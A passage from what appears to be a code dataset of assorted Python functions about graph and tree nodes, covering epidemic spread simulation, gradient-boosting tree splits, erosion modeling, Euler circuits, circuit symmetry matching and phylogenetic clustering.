npts\")\n ind = np.arange(1, npts + 1)\n nodes = 0.5 * (1 - np.cos(np.pi * ind / (npts + 1)))\n return nodes * (ilbds1d[1] - ilbds1d[0]) + ilbds1d[0]", "def calculate(self, extraParams=None):\n\n if not self.isCalc or self.nodeClass == \"button\" or self.nodeClass == \"formnode\":\n nodeIsCircular = self.isCircular()\n if not self._bypassCircularEvaluator and nodeIsCircular:\n circularNodes = self.getSortedCyclicDependencies()\n\n if self.dynamicEvaluator is None:\n self.dynamicEvaluator = FactoryDynamic.createInstance(\n circularNodes, self)\n\n params = self.dynamicEvaluator.generateCircularParameters(\n self, circularNodes)\n\n if params['dynamicIndex'] is None:\n raise ValueError(\"Cyclic dependency detected between nodes: \" + \",\".join(\n circularNodes) + \". Please use the 'pp.dynamic' function\")\n elif 'indexDic' in params and len(params['indexDic']) > 1:\n raise ValueError(\n f'Multiple indices were found using dynamic. Indexes: {\",\".join(params[\"indexDic\"].keys())}. Nodes involved: {\",\".join(circularNodes)}')\n\n self.dynamicEvaluator.circularEval(self, params)\n else:\n from_circular_evaluator = self._bypassCircularEvaluator\n\n self.sendStartCalcNode(from_circular_evaluator)\n self.model.currentProcessingNode(self.identifier)\n self._bypassCircularEvaluator = False\n\n startTime = dt.datetime.now()\n finalDef = str(self._definition)\n self.lastLazyTime = 0\n\n # CLEAR circular dependency\n if nodeIsCircular:\n finalDef = BaseDynamic.clearAllCircularDependency(finalDef)\n tmpCode = self.compileDef(finalDef)\n\n # check for replace calls to varaibles with next rules:\n # node1 --> change to getNode('node1').result\n # node1.result --> change to getNode('node1').result\n # node1.title --> change to getNode('node1').title\n # \"node1\" --> no change\n # 'node1' --> no change\n if not tmpCode is None:\n names = self.parseNames(tmpCode)\n rx = r\"('[^'\\\\]*(?:\\\\.[^'\\\\]*)*'|\\\"[^\\\"\\\\]*(?:\\\\.[^\\\"\\\\]*)*\\\")|\\b{0}\\b\"\n for node in names:\n if self._model.existNode(self._model.clearId(node)):\n finalDef = re.sub(rx.format(node), lambda m:\n (\n m.group(1)\n if m.group(1)\n else\n (\n \"getNode('\"+node+\"')\"\n if (m.endpos > m.regs[0][1]+5) and ((m.string[m.regs[0][1]:m.regs[0][1]+5] == '.node') or (m.string[m.regs[0][1]:m.regs[0][1]+8] == '.timeit('))\n else\n (node\n if (m.string[m.regs[0][0]-1:m.regs[0][0]+len(node)] == ('.'+node)) or (m.string[m.regs[0][0]-7:m.regs[0][0]] == 'import ') or (m.string[m.regs[0][0]-5:m.regs[0][0]] == 'from ')\n else \"getCalcNode('\"+node+\"')\"\n )\n )\n ), finalDef, 0, re.IGNORECASE)\n elif node == \"self\":\n finalDef = re.sub(rx.format(node), lambda m:\n (\n m.group(1)\n if m.group(1)\n else\n \"getNode('\" + self.identifier + \"')\"\n if (m.endpos > m.regs[0][1]+11) and (m.string[m.regs[0][1]:m.regs[0][1]+11] != '._tryFilter')\n else \"self\"\n ), finalDef, 0, re.IGNORECASE)\n\n localRes = {\n \"getNode\": self._model.getNode,\n \"getCalcNode\": self._getCalcNode,\n \"cp\": Helpers(self)\n }\n if not extraParams is None:\n for keyParam in extraParams:\n localRes[keyParam] = extraParams[keyParam]\n\n customImports = self.model.getCustomImports()\n if customImports:\n for keyParam in customImports:\n localRes[keyParam] = customImports[keyParam]\n\n try:\n # execute node definition in supervised context\n memoryIO = io.StringIO()\n try:\n with redirect_stdout(memoryIO):\n exec(compile(finalDef, '<string>', 'exec'), localRes)\n except Exception as ex:\n if \"_io.StringIO\" in str(ex):\n exec(compile(finalDef, '<string>', 'exec'), localRes)\n else:\n raise ex\n\n self.lastEvaluationConsole = memoryIO.getvalue()\n memoryIO = None\n\n if self.nodeClass not in [\"button\", \"module\", \"text\"]:\n if 'this' in localRes:\n self._result = localRes['this']\n elif 'result' in localRes:\n self._result = localRes['result']\n else:\n self._result = None\n if self.lastEvaluationConsole != \"\":\n self._result = str(self.lastEvaluationConsole)\n else:\n raise ValueError(\n \"The result was not found. Did you forget to include the text 'result =' ?\")\n\n self._isCalc = self.nodeClass != \"button\"\n self.postCalculate()\n\n endTime = dt.datetime.now()\n self.lastEvaluationTime = (\n endTime - startTime).total_seconds() - self.lastLazyTime\n if self.lastEvaluationTime < 0:\n self.lastEvaluationTime = 0\n self.evaluationVersion = self.model.evaluationVersion\n finally:\n localRes[\"cp\"].release()\n localRes = None\n self.sendEndCalcNode(from_circular_evaluator)\n else:\n self._bypassCircularEvaluator = False", "def start_one_step(self):\r\n new_infected_list = []\r\n old_infected_list = copy.deepcopy(self.infected_list)\r\n new_recovered_list = []\r\n old_recovered_list = copy.deepcopy(self.recovered_list)\r\n # For each infected node\r\n for infected_nid in old_infected_list:\r\n infected_node = self.node_dict[infected_nid]\r\n # For each neighbor\r\n for dst_nid in infected_node.get_dst_nid_list(self.graph):\r\n dst_node = self.node_dict[dst_nid]\r\n # Infect susceptible nodes with probability [p]\r\n if dst_node.state is NodeState.SUSCEPTIBLE and random.random() < self.p:\r\n dst_node.infected(self.i)\r\n new_infected_list.append(dst_nid)\r\n\r\n # Minus 1 turn of (remaining) infected days for all infected nodes\r\n infected_node.minus_one_state_day()\r\n # If infected node is recovered\r\n if infected_node.check_finish_infection():\r\n # Infected node get recovered\r\n infected_node.recovered(self.r)\r\n # Remove from infected list\r\n self.infected_list.remove(infected_nid)\r\n # Append to recovered list\r\n new_recovered_list.append(infected_nid)\r\n\r\n # Add newly infected nodes into infected list\r\n self.infected_list += new_infected_list\r\n\r\n # For each recovered node\r\n for recovered_nid in old_recovered_list:\r\n recovered_node = self.node_dict[recovered_nid]\r\n # Minus 1 turn of (remaining) recovered days for all recovered nodes\r\n recovered_node.minus_one_state_day()\r\n # If infected node is recovered\r\n if recovered_node.check_finish_recovery():\r\n # Recovered node get recovered\r\n recovered_node.susceptible()\r\n # Remove from recovered list\r\n self.recovered_list.remove(recovered_nid)\r\n\r\n # Add newly recovered nodes into recovered list\r\n self.recovered_list += new_recovered_list", "def split_next(self):\n # Consider the node with the highest loss reduction (a.k.a. gain)\n node = heappop(self.splittable_nodes)\n\n tic = time()\n (sample_indices_left,\n sample_indices_right,\n right_child_pos) = self.splitter.split_indices(node.split_info,\n node.sample_indices)\n self.total_apply_split_time += time() - tic\n\n depth = node.depth + 1\n n_leaf_nodes = len(self.finalized_leaves) + len(self.splittable_nodes)\n n_leaf_nodes += 2\n\n left_child_node = TreeNode(depth,\n sample_indices_left,\n node.split_info.sum_gradient_left,\n node.split_info.sum_hessian_left,\n parent=node)\n right_child_node = TreeNode(depth,\n sample_indices_right,\n node.split_info.sum_gradient_right,\n node.split_info.sum_hessian_right,\n parent=node)\n left_child_node.sibling = right_child_node\n right_child_node.sibling = left_child_node\n node.right_child = right_child_node\n node.left_child = left_child_node\n\n # set start and stop indices\n left_child_node.partition_start = node.partition_start\n left_child_node.partition_stop = node.partition_start + right_child_pos\n right_child_node.partition_start = left_child_node.partition_stop\n right_child_node.partition_stop = node.partition_stop\n\n self.n_nodes += 2\n\n if self.max_depth is not None and depth == self.max_depth:\n self._finalize_leaf(left_child_node)\n self._finalize_leaf(right_child_node)\n return left_child_node, right_child_node\n\n if (self.max_leaf_nodes is not None\n and n_leaf_nodes == self.max_leaf_nodes):\n self._finalize_leaf(left_child_node)\n self._finalize_leaf(right_child_node)\n self._finalize_splittable_nodes()\n return left_child_node, right_child_node\n\n if left_child_node.n_samples < self.min_samples_leaf * 2:\n self._finalize_leaf(left_child_node)\n if right_child_node.n_samples < self.min_samples_leaf * 2:\n self._finalize_leaf(right_child_node)\n\n # Compute histograms of childs, and compute their best possible split\n # (if needed)\n should_split_left = left_child_node.value is None # node isn't a leaf\n should_split_right = right_child_node.value is None\n if should_split_left or should_split_right:\n\n # We will compute the histograms of both nodes even if one of them\n # is a leaf, since computing the second histogram is very cheap\n # (using histogram subtraction).\n n_samples_left = left_child_node.sample_indices.shape[0]\n n_samples_right = right_child_node.sample_indices.shape[0]\n if n_samples_left < n_samples_right:\n smallest_child = left_child_node\n largest_child = right_child_node\n else:\n smallest_child = right_child_node\n largest_child = left_child_node\n\n # We use the brute O(n_samples) method on the child that has the\n # smallest number of samples, and the subtraction trick O(n_bins)\n # on the other one.\n tic = time()\n smallest_child.histograms = \\\n self.histogram_builder.compute_histograms_brute(\n smallest_child.sample_indices)\n largest_child.histograms = \\\n self.histogram_builder.compute_histograms_subtraction(\n node.histograms, smallest_child.histograms)\n self.total_compute_hist_time += time() - tic\n\n tic = time()\n if should_split_left:\n self._compute_best_split_and_push(left_child_node)\n if should_split_right:\n self._compute_best_split_and_push(right_child_node)\n self.total_find_split_time += time() - tic\n\n return left_child_node, right_child_node", "def update_nodes(nodes, svg_h):\n for i in range(0, len(nodes)):\n nodes[i,2] = svg_h-nodes[i,2]\n return nodes", "def _buildtree(self):\n self.pricetree = np.zeros((self.steps+1,self.steps+1))\n self.pricetree[0][0] = self.p\n for j in range(self.steps):\n for i in range(j+1):\n self.pricetree[j+1][i+1] = self.pricetree[j][i]*self.down\n self.pricetree[j+1][0] = self.pricetree[j][0]*self.up", "def run_one_step(self, dt):\n if not self._erode_flooded_nodes:\n flood_status = self._grid.at_node[\"flood_status_code\"]\n flooded_nodes = np.nonzero(flood_status == _FLOODED)[0]\n else:\n flooded_nodes = []\n\n upstream_order_IDs = self._grid[\"node\"][\"flow__upstream_node_order\"]\n\n defined_flow_receivers = np.not_equal(\n self._grid[\"node\"][\"flow__link_to_receiver_node\"], self._grid.BAD_INDEX\n )\n\n try:\n length_of_link = self._grid.length_of_d8\n except AttributeError:\n length_of_link = self._grid.length_of_link\n\n flow_link_lengths = length_of_link[\n self._grid.at_node[\"flow__link_to_receiver_node\"][defined_flow_receivers]\n ]\n flow_receivers = self._grid[\"node\"][\"flow__receiver_node\"]\n\n # Operate the main function:\n if self._use_W:\n self._alpha[defined_flow_receivers] = (\n self._K[defined_flow_receivers]\n * dt\n * self._A[defined_flow_receivers] ** self._m\n / self._W[defined_flow_receivers]\n / (flow_link_lengths**self._n)\n )\n\n else:\n self._alpha[defined_flow_receivers] = (\n self._K[defined_flow_receivers]\n * dt\n * self._A[defined_flow_receivers] ** self._m\n / (flow_link_lengths**self._n)\n )\n\n # Handle flooded nodes, if any (no erosion there)\n if flooded_nodes is not None:\n self._alpha[flooded_nodes] = 0.0\n\n reversed_flow = self._elevs < self._elevs[flow_receivers]\n # this check necessary if flow has been routed across\n # depressions\n self._alpha[reversed_flow] = 0.0\n\n threshdt = self._sp_crit * dt\n\n # solve using Brent's Method in Cython for Speed\n if isinstance(threshdt, float):\n brent_method_erode_fixed_threshold(\n upstream_order_IDs,\n flow_receivers,\n threshdt,\n self._alpha,\n self._n,\n self._elevs,\n )\n else:\n brent_method_erode_variable_threshold(\n upstream_order_IDs,\n flow_receivers,\n threshdt,\n self._alpha,\n self._n,\n self._elevs,\n )", "def brents(f, x0, x1, max_iter=50, tolerance=1e-5):\n \n fx0 = f(x0)\n fx1 = f(x1)\n \n assert (fx0 * fx1) <= 0, \"Root not bracketed\" \n \n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n fx0, fx1 = fx1, fx0\n \n x2, fx2 = x0, fx0\n \n d = np.nan\n mflag = True\n steps_taken = 0\n \n while steps_taken < max_iter and abs(x1-x0) > tolerance:\n fx0 = f(x0)\n fx1 = f(x1)\n fx2 = f(x2)\n \n if fx0 != fx2 and fx1 != fx2:\n L0 = (x0 * fx1 * fx2) / ((fx0 - fx1) * (fx0 - fx2))\n L1 = (x1 * fx0 * fx2) / ((fx1 - fx0) * (fx1 - fx2))\n L2 = (x2 * fx1 * fx0) / ((fx2 - fx0) * (fx2 - fx1))\n new = L0 + L1 + L2\n \n else:\n new = x1 - ( (fx1 * (x1 - x0)) / (fx1 - fx0) )\n \n tt1 = (new < ((3 * x0 + x1) / 4) or new > x1)\n tt2 = (mflag == True and (abs(new - x1)) >= (abs(x1 - x2) / 2))\n tt3 = (mflag == False and (abs(new - x1)) >= (abs(x2 - d) / 2))\n tt4 = (mflag == True and (abs(x1 - x2)) < tolerance)\n tt5 = (mflag == False and (abs(x2 - d)) < tolerance)\n if (tt1 or\n tt2 or\n tt3 or\n tt4 or\n tt5):\n new = (x0 + x1) / 2\n mflag = True\n \n else:\n mflag = False\n \n fnew = f(new)\n d, x2 = x2, x1\n \n if (fx0 * fnew) < 0:\n x1 = new\n else:\n x0 = new\n \n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n \n steps_taken += 1\n \n return x1, steps_taken", "def make_euler_circuit(start_node, updated_graph_instance):\n\n current_edges_on_graph_list = make_edges_list(updated_graph_instance.edges_dict)\n\n current_node = start_node\n\n node_visit_order = [current_node]\n edge_visit_order = []\n\n # print(\"\\n\\n\\ncurrent_edges_on_graph_list:\", current_edges_on_graph_list)\n\n while len(current_edges_on_graph_list) > 0:\n\n # print(\"current_edges_on_graph_list:\", current_edges_on_graph_list)\n # while there are still edges on the graph, keep traversing\n\n current_bridges_on_graph = get_bridges(current_edges_on_graph_list)\n\n edges_conn_to_current_node = get_all_conn_edges_remaining_in_graph(\n current_node, current_edges_on_graph_list, updated_graph_instance.nodes_dict\n )\n\n edge_to_traverse = choose_edge_to_traverse(\n current_node, edges_conn_to_current_node, current_bridges_on_graph\n )\n\n if edge_to_traverse in current_edges_on_graph_list:\n\n current_edges_on_graph_list.remove(edge_to_traverse)\n\n else:\n\n current_edges_on_graph_list.remove(edge_to_traverse[::-1])\n\n edge_to_traverse_list = list(edge_to_traverse)\n # remove current node from edge to traverse\n edge_to_traverse_list.remove(current_node)\n # update current node to be the only node left in the edge list\n\n # update edge traveral list with edge just traversed\n edge_traversed = (current_node, edge_to_traverse_list[0])\n\n edge_visit_order.append(edge_traversed)\n\n current_node = edge_to_traverse_list[0]\n\n # add the new current node to the nodes visit order list\n node_visit_order.append(current_node)\n\n # add node visit order and edge_visit order to graph instance\n\n updated_graph_instance.node_visit_order = node_visit_order\n\n updated_graph_instance.edge_visit_order = edge_visit_order\n\n updated_graph_instance.node_geojson = make_node_geojson(updated_graph_instance)\n\n updated_graph_instance.edge_geojson = make_edge_geojson(updated_graph_instance)\n\n updated_graph_instance.route_geojson = make_route_geojson(updated_graph_instance)\n\n print(\"\\n\\n\\n\\n\\nROUTE COLLECTION\", updated_graph_instance.route_geojson)\n\n print(\"check done\")\n\n return updated_graph_instance", "def compare_nodes(G,all_match_pairs,match_pair,traversed,node1,node2, ports_weight):\n logger.debug(f\"comparing {node1},{node2}, traversed {traversed}\")\n nbrs1 = sorted(set(G.neighbors(node1)) - set(traversed))\n #remove dummies\n nbrs1 = sorted(set([nbr for nbr in nbrs1 if G.get_edge_data(node1, nbr)['weight'] !=7]))\n nbrs2 = sorted(set(G.neighbors(node2)) - set(traversed))\n #remove dummies\n nbrs2 = sorted(set([nbr for nbr in nbrs2 if G.get_edge_data(node2, nbr)['weight'] !=7]))\n logger.debug(f\"node1:{node1},property: {G.nodes[node1]},neigbors1: {nbrs1}\")\n logger.debug(f\"node2:{node2},property: {G.nodes[node2]},neigbors2: {nbrs2}\")\n if not nbrs1 or not nbrs2:\n if compare_two_nodes(G, node1, node2, ports_weight):\n match_pair[node1] = node2\n logger.debug(f\"no new neihbours, returning recursion {match_pair}\")\n return\n elif len(nbrs1)> 10:\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n logger.debug(f\"skipping high fanout nets due to large computation, {node1} {nbrs1}\")\n traversed.append(node1)\n return\n elif len(nbrs2)> 10:\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n traversed.append(node2)\n logger.debug(f\"skipping high fanout nets due to large computation, {node2} {nbrs2}\")\n return\n\n if node1 == node2:\n if node1 in match_pair.keys() or node1 in match_pair.values():\n logger.debug(\"avoid existing pair wise symmetry\")\n return\n logger.debug(f\"single node {node1}, nbrs {nbrs1}, nbr_weight {[G.get_edge_data(node1,nbr) for nbr in nbrs1]}\")\n SD_nbrs= [nbr for nbr in nbrs1 if G.get_edge_data(node1, nbr)['weight'] !=2]\n ## TBD: filter based on primitive constraints\n ## Right now will try to figure out S/D paths\n if len(SD_nbrs) ==0:\n logger.debug(f\"No SD paths found to traverse\")\n match_pair[node1]=node1\n elif len(SD_nbrs) ==1:\n logger.debug(f\"traversing single S/D path {SD_nbrs}\")\n match_pair[node1]=node1\n traversed.append(node1)\n compare_nodes(G,all_match_pairs,match_pair,traversed,SD_nbrs[0],SD_nbrs[0],ports_weight)\n else:\n logger.debug(f\" multiple nodes diverging {SD_nbrs}\")\n logger.debug(f\"nbr weights: {SD_nbrs} {[G.get_edge_data(node1, nbr)['weight'] for nbr in SD_nbrs ]}\")\n match_pair[node1]=node1\n traversed.append(node1)\n new_sp=sorted(set(SD_nbrs)-set(traversed))\n all_match_pairs_local={}\n for nbr1,nbr2 in combinations(new_sp, 2):\n logger.debug(f\"recursive pair call from single branch {nbr1} {nbr2}\")\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n if new_pair:\n #new_pair[nbr1]=nbr2\n all_match_pairs_local[nbr1+'_'+nbr2] = new_pair\n all_match_pairs_local={k: v for k, v in all_match_pairs_local.items() if len(v)>0}\n if len(all_match_pairs_local)==1:\n match_pair.update( all_match_pairs_local[list(all_match_pairs_local.keys())[0]])\n logger.debug(f\"found inline pair: {pprint.pformat(match_pair, indent=4)}\")\n else:\n for nbr1 in new_sp:\n if (nbr1+'_'+nbr1 not in all_match_pairs.keys()):\n logger.debug(f\"recursive single branch call from single branch {nbr1} {nbr1}\")\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr1,ports_weight)\n #filtering multiple axis of symmetries with same block, ideally they should be handled by array generation\n if new_pair:\n all_match_pairs[nbr1+'_'+nbr1] = new_pair\n logger.debug(f\"updating match pairs: {pprint.pformat(all_match_pairs, indent=4)}\")\n\n\n elif nbrs1 == nbrs2:\n logger.debug(f\"traversing converging branch\")\n match_pair[node1]=node2\n traversed+=[node1,node2]\n nbrs1=sorted(set(nbrs1)-set([node1,node2]))\n logger.debug(f\"all non traversed neighbours: {nbrs1}\")\n if len(nbrs1)==1:\n nbr1=nbr2=nbrs1[0]\n logger.debug(f\"keeping single converged branch inline {nbr1} {nbr2}\")\n compare_nodes(G,all_match_pairs,match_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n else:\n for nbr1,nbr2 in combinations_with_replacement(nbrs1,2):\n logger.debug(f\"recursive call from converged branch {nbr1} {nbr2}\")\n if nbr1+'_'+nbr2 not in all_match_pairs.keys():\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n #filtering multiple axis of symmetries with same block, ideally they should be handled by array generation\n if new_pair:\n all_match_pairs[nbr1+'_'+nbr2] = new_pair\n logger.debug(f\"updating match pairs: {pprint.pformat(all_match_pairs, indent=4)}\")\n\n\n elif compare_two_nodes(G,node1,node2,ports_weight):\n nbrs1 = sorted(set([nbr for nbr in nbrs1 if G.get_edge_data(node1, nbr)['weight'] !=2]))\n nbrs2 = sorted(set([nbr for nbr in nbrs2 if G.get_edge_data(node2, nbr)['weight'] !=2]))\n match_pair[node1]=node2\n traversed+=[node1,node2]\n logger.debug(f\"Traversing parallel branches from {node1},{node2} {nbrs1}, {nbrs2}\")\n nbrs1_wt = [G.get_edge_data(node1, nbr)['weight'] for nbr in nbrs1]\n nbrs2_wt = [G.get_edge_data(node2, nbr)['weight'] for nbr in nbrs2]\n unique_match=find_unique_matching_branches(G,nbrs1,nbrs2,ports_weight)\n if len(nbrs1)==0 or len(nbrs2)==0:\n logger.debug(f\"no new SD neihbours, returning recursion {match_pair}\")\n elif len(nbrs1) ==1 and len(nbrs2)==1:\n logger.debug(f\"traversing binary branch\")\n compare_nodes(G,all_match_pairs,match_pair,traversed,nbrs1.pop(),nbrs2.pop(),ports_weight)\n elif unique_match:\n logger.debug(f'traversing unique matches {unique_match}')\n match_pair[node1]=node2\n traversed+=[node1,node2]\n for nbr1,nbr2 in unique_match.items():\n logger.debug(f\"recursive call from binary {node1}:{node2} to {nbr1}:{nbr2}\")\n compare_nodes(G,all_match_pairs,match_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n elif len(nbrs1_wt)>len(set(nbrs1_wt))>1 and len(nbrs2_wt)>len(set(nbrs2_wt))>1:\n logger.debug(f\"setting new start points {node1} {node2}\")\n match_pair[node1]=node2\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n else:\n match_pair = {}\n logger.debug(f\"end all traversal from binary branch {node1} {node2}\")\n\n else:\n match_pair = {}\n logger.debug(f\"end of recursion branch, matches {match_pair}\")", "def flep(tree_adj, nodes_sign, edge_weight, root, return_fullcut_info=False):\n # start = clock()\n assert isinstance(tree_adj, dict)\n if not (isinstance(nodes_sign, tuple) and len(nodes_sign) == 2):\n nodes_sign = (nodes_sign, nodes_sign)\n if root in nodes_sign[0]:\n cutp, cutn = (MAX_WEIGHT, 0) if nodes_sign[0][root] < 0 else (0, MAX_WEIGHT)\n val_1 = nodes_sign[0][root]*MAX_WEIGHT\n cutp_, cutn_ = (MAX_WEIGHT, 0) if nodes_sign[1][root] < 0 else (0, MAX_WEIGHT)\n val_2 = nodes_sign[1][root]*MAX_WEIGHT\n return (val_1, val_2), {}, {root: (True, -1, cutp, cutn, cutp_, cutn_)}\n stack = []\n status = defaultdict(lambda: (False, -1, 0, 0, 0, 0))\n stack.append(root)\n while stack:\n v = stack.pop()\n if v >= 0:\n discovered, pred, cutp, cutn, cutp_, cutn_ = status[v]\n else:\n v = -(v+100)\n discovered, pred, cutp, cutn, cutp_, cutn_ = status[v]\n for child in tree_adj[v]:\n if status[child][1] != v:\n continue\n eweight = edge_weight[(child, v) if child < v else (v, child)]\n _, _, childp, childn, childp_, childn_ = status[child]\n cutp += min(childp, childn + eweight)\n cutn += min(childn, childp + eweight)\n cutp_ += min(childp_, childn_ + eweight)\n cutn_ += min(childn_, childp_ + eweight)\n status[v] = (discovered, pred, cutp, cutn, cutp_, cutn_)\n # print('{}: (+: {}, -: {})'.format(v, cutp, cutn))\n if v == root:\n # FLEP_CALLS_TIMING.append(clock() - start)\n intermediate = {}\n if return_fullcut_info:\n intermediate = {n: vals[2:6]\n for n, vals in status.items()\n if vals[0] and n not in nodes_sign[0]}\n return (((cutn - cutp), (cutn_ - cutp_)), intermediate, status)\n\n if not discovered:\n status[v] = (True, pred, cutp, cutn, cutp_, cutn_)\n if v in nodes_sign[0]:\n # don't go beyond revealed nodes\n continue\n stack.append(-(v+100))\n for w in tree_adj[v]:\n discovered, pred, cutp, cutn, cutp_, cutn_ = status[w]\n if pred == -1 and w != root:\n if w in nodes_sign[0]:\n cutp, cutn = (MAX_WEIGHT, 0) if nodes_sign[0][w] < 0 else (0, MAX_WEIGHT)\n cutp_, cutn_ = (MAX_WEIGHT, 0) if nodes_sign[1][w] < 0 else (0, MAX_WEIGHT)\n status[w] = (discovered, v, cutp, cutn, cutp_, cutn_)\n if not discovered:\n stack.append(w)\n assert False, root", "def CreateTree(d,list_L):\r\n \r\n d_new = defaultdict(dict)\r\n \r\n #labels corresponding to minimum evolutionary distance in Matrix\r\n a,b = minInDict(d)\r\n\r\n n = ['(',a,',',b,')']\r\n new_cluster = ''.join(n)\r\n \r\n #remove the entries in newly formed cluster from our list\r\n for k in list_L:\r\n if k == a:\r\n list_L.remove(k)\r\n break\r\n for p in list_L:\r\n if p == b:\r\n list_L.remove(p)\r\n break\r\n\r\n #to remove an existing cluster with those entries\r\n for j in list_L:\r\n if a in j or b in j:\r\n list_L.remove(j)\r\n\r\n #Base case of our recursive function \r\n if len(d) == 1:\r\n return new_cluster\r\n\r\n #calculating distances from our new cluster(eg: (a,b))to other labels/clusters\r\n for q in list_L:\r\n \r\n if b in d:\r\n if q in d[a] and q in d[b]:\r\n d_new[new_cluster][q] = (d[a][q] + d[b][q])/2\r\n continue\r\n if q in d:\r\n if b in d[q] and q in d[a]:\r\n d_new[new_cluster][q] = (d[a][q] + d[q][b])/2\r\n continue\r\n if b in d:\r\n if a in d[q] and q in d[b]:\r\n d_new[new_cluster][q] = (d[q][a] + d[b][q])/2\r\n continue\r\n if a in d[q] and b in d[q]:\r\n d_new[new_cluster][q] = (d[q][a] + d[q][b])/2\r\n \r\n list_L.insert(0,new_cluster)\r\n \r\n #deleting row and column corresponding to a and b\r\n del d[a]\r\n if b in d:\r\n del d[b]\r\n \r\n for p in d:\r\n for q in d[p]:\r\n if q != b and q != a:\r\n d_new[p][q] = d[p][q]\r\n\r\n return CreateTree(d_new,list_L)", "def fractionalPoints(totalNodeList, recNodeList, fracPoints):\n\n avPoint = averagePoints(recNodeList)\n\n for i in range(0, fracPoints):\n closestPoint = closest_node(avPoint, totalNodeList) #Finds closest point\n totalNodeList.remove(closestPoint)\n recNodeList.append(closestPoint)\n\n printProgressBar(i, fracPoints) \n\n return recNodeList", "def get_nodes(final_node, discard_params=True):\n var_nodes = []\n func_nodes = []\n seen_ids = set()\n\n # We re-do backward var iter here, with some changes\n cand_funcs = []\n seen = set()\n \n def add_cand(cand):\n if cand not in seen:\n # Negate since heapq is min-heap\n heapq.heappush(cand_funcs, (-cand.rank, len(seen), cand))\n seen.add(cand)\n \n add_cand(final_node.creator_node)\n seen_ids.add(id(final_node))\n \n while cand_funcs:\n _,_,func = heapq.heappop(cand_funcs)\n inputs = func.inputs\n target_inputs = [x for x in inputs if x.requires_grad]\n if not target_inputs:\n continue\n \n if id(func) not in seen_ids:\n func_nodes += [func]\n seen_ids.add(id(func))\n \n for x in target_inputs:\n if discard_params and x.creator_node is None:\n if isinstance(x.get_variable_or_none(), Parameter):\n continue # Discard param dead ends\n \n if id(x) not in seen_ids:\n var_nodes += [x]\n seen_ids.add(id(x))\n \n if x.creator_node is not None:\n add_cand(x.creator_node)\n \n return var_nodes, func_nodes", "def prepare_initial_nodes(x_start, x_end, nodes_y):\n nodes_x = [float(x_start + ((x_end - x_start) / (len(nodes_y) - 1)) * i) for i in range(0, len(nodes_y))]\n nodes_y = [float(y) for y in nodes_y]\n print(nodes_x)\n print(nodes_y)\n nodes = list(zip(nodes_x, nodes_y))\n return nodes", "def _compute_newton_step(lambdas, p_norm, w_norm):\n return lambdas.candidate + (p_norm / w_norm) ** 2 * (p_norm - 1)", "def next_node_dfs(search_state, last_node_is_ok):\n log_T, initial_state, min_score, max_depth, maxtraversals, node, node_idx, it, order, score, sub_info = search_state\n min_score = float(min_score) # make sure numba knows this is a float (otherwise, sometimes, it doesn't (bug in numba))\n n_states = log_T.shape[0]\n if it == maxtraversals:\n assert False, \"Number of traversals exceeded\"\n while True:\n # next node ##\n # try adding a value at the end\n for next_idx, next_state in enumerate(order[node[-1]]):\n if last_node_is_ok and min_score <= score + log_T[node[-1], next_state] and len(node) < max_depth \\\n and syntax_check(np.array(node + [next_state]), sub_info, partial=True):\n node.append(next_state)\n node_idx.append(next_idx)\n break\n # adding a value at the end failed, so we are a leave\n else:\n for p in xrange(len(node) - 1, -1, -1):\n if node_idx[p] != n_states - 1: # find where within the node to increase (and discard all others after)\n old_idx = node_idx[p]\n del node_idx[p:]\n del node[p:]\n node_idx.append(old_idx + 1)\n prev_state = node[p - 1] if p > 0 else initial_state\n node.append(order[prev_state, node_idx[p]])\n break\n else:\n search_state = log_T, initial_state, min_score, max_depth, maxtraversals, list(node), list(node_idx), it, order, score, sub_info\n return [-1], score, search_state # end of the generator, can't increase even the root\n last_node_is_ok = True # We can now make progress again, regardless of whether we could at the beginning\n it += 1\n # score and return current node if adequate\n score = log_T[initial_state, node[0]]\n for p in xrange(1, len(node)):\n score += log_T[node[p - 1], node[p]]\n if min_score <= score and syntax_check(np.array(node), sub_info, partial=False):\n search_state = log_T, initial_state, min_score, max_depth, maxtraversals, list(node), list(node_idx), it, order, score, sub_info\n return list(node), score, search_state # the invocation to list here is to make a copy, don't remove!", "def getNodesAndDistances():\n\n\tglobal width, height\n\n\t# First we generate the list\n\n\tprint \"\\tGetting node list...\"\n\t\n\tnodeDict = {}\n\n\tfor y in range(height):\n\t\tfor x in range(width):\n\t\t\ttheType = getSquare(x, y)\n\n\t\t\tprint \"\\t\\tGetting list for node (%d, %d) of type %d...\" % (x, y, theType)\n\n\t\t\ttempList = getNodeList(x, y, theType)\n\n\t\t\tif tempList == []:\n\t\t\t\tprint \"\\t\\t\\tNo nodes here.\"\n\t\t\telse:\n\t\t\t\tfor i in range(len(tempList)):\n\t\t\t\t\tnode = tempList[i]\n\t\t\t\t\tnodeName = node[0]\n\t\t\t\t\tnodeDict[nodeName] = node[1:]\t# Everything but the first element\n\t\t\t\t\tprint \"\\t\\t\\tAdded node '%s'...\" % nodeName\n\n\tprint \"\\tDone getting node list (%d nodes)...\" % (len(nodeDict.keys()))\n\tprint \"\"\n\n\t# Now that we've got that, we get a list of pairs\n\n\tpairList = getPairList(nodeDict)\n\n\t# Now we calculate the distance between every pair of nodes that connect\n\n\tprint \"\"\n\tprint \"\\tCreateing dictionary of distances between connected nodes...\"\n\n\tdistanceDict = {}\n\n\tfor tuple in pairList:\n\t\t(nodeA, nodeB) = tuple\n\t\tprint \"\\t\\tCalculating distance between '%s' and '%s'...\" % (nodeA, nodeB)\n\t\tdistance = distanceBetween(nodeA, nodeB, nodeDict)\n\t\tpairName = \"%s%s\" % (nodeA, nodeB)\n\t\tdistanceDict[pairName] = distance\n\t\tprint \"\\t\\t\\tDistace was %f.\" % 